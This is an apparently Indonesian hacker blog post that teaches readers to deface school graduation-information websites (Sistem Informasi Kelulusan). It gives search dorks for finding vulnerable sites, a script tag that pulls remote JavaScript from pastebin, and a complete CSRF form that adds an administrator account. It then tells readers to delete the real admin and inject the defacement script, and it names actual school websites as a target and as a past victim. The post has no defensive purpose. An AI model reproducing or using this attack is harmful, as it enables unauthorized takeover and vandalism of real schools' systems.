Hallo Guys Kembali Lagi Dengan Gua MR.M05T3R, Disini Gua Bakal Kasih Tutorial Cara Deface Poc CSRF Add Admin SIK (Sistem Informasi Kelulusan), Sebelum Ke Tutorial Nya Jangan Lupa Follow Akun Gua Yah Guys.
Oke Guys Setelah Kalian Follow Akun Gua Langsung Aja Gas Ke Tutorialnya, Siapkan Bahawn Nya Yah Guys:
Bahan Yang Harus Lu Siapin:
> Dork
> Script Deface (JSO)
> Script Csrf
#DORK:
> Sistem Informasi Kelulusan
> SIK "Sistem Informasi Kelulusan"
"Kembangin Lagi Biar Dapat Yang Fresh Yah Guys"
#SCRIPT JSO:
(<script type="text/javascript" src="https://pastebin.com/raw/99jAyq0j"></script>)
"Tools Jso Generatornya Klik Disini Yah Guys"
#SCRIPT CSRF:
(<html>
<body>
<center>
<hr>
<form action="target.com/admin/simpanpetugas.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CYBER ALLIANCE | NEWBIE CYBER SECURITY </h1>
<h2> HACKED BY MR.M05T3R </h2>
</body>
</html>)
Oke Guys Setelah Bahan Nya Udah Siap Semua Kalian Tinggal Dork Aja!!
Kalian Cari Website Target Kalian Yah Guys Contoh Gua Pake Target Ini (https://www.kelulusan.mimuabbidin.sch.id/)
Nah Jika Sudah Maka Kalian Save Dengan Type HTML Yah Guys Contoh "Csrf.html", Lalu Kalian Open File Csrf Kalian Ke Google Atau Browser Terserah Kalian Yah Guys.
Nanti Tampilannya Seperti Ini Guys Tinggal Kalian Isi Bebas 3 Kolom Tersebut Buat Login Kalian.
Nah Jika Berhasil Maka Tampilan Nya Seperti Ini Guys, Ingat Tidak Semua Website Vuln Terhadap Serangan Deface.
Nah Kalian Login Deh Pake Username Ama Password Yang Kalian Buat Tadi, (Min Di Gua Gk Ada Tempat Loginnya Min, Gimana Nih?). Nah Jika Diwebsite Nya Tidak Ada Tempat Login Kalian Tinggal Tambahkan Tulisan "index.php?page=login" Dibelakang Sitenya https://www.kelulusan.mimuabbidin.sch.id/index.php?page=login Dan Kalian Tinggal Login.
Nah Jika Kalian Berhasil Login Kalian Klik Ke Menu Pengguna Dan Hapus Data Admin Aslinya Dan Tambah Kan Data Petugas, Isi Dengan Script Jso Kalian Seperti Ini Yah Guys:
Nah Jika Sudah Kalian Tinggal Save Maka Tampilannya Akan Berubah Jika Tidak Berubah Berarti Website Nya Gk Vuln Dengan Jso Yah Guys. (Trus Gimana Solusinya Min?) Tenang Kalian Langsung Klik Atur Profile Dan Edit Data Nya.
Nah Seperti Itu Dan Btw Karena Website Nya Tiba-Tiba Blank Mimin Gk Bisa Kasih Hasilnya Yah Guys Sorry, Tapi Mimin Ada Hasil Dari Deface Poc Csrf Add Admin Semalem:
Ini Hasil Gua Deface Semalem Guys Tampilannya Bakal Seperti Ini, Website Targetnya (https://kelulusan.sman1seteluk.sch.id/).
Selamat Mencoba Yah Guys, Btw Nitip Nick Team Gua Ama Nick Gua Di Script Deface Kalian Yah Guys.
Bolehkah gua balik belajar di lu?
BalasHapusHmmm
BalasHapusππ
Hapus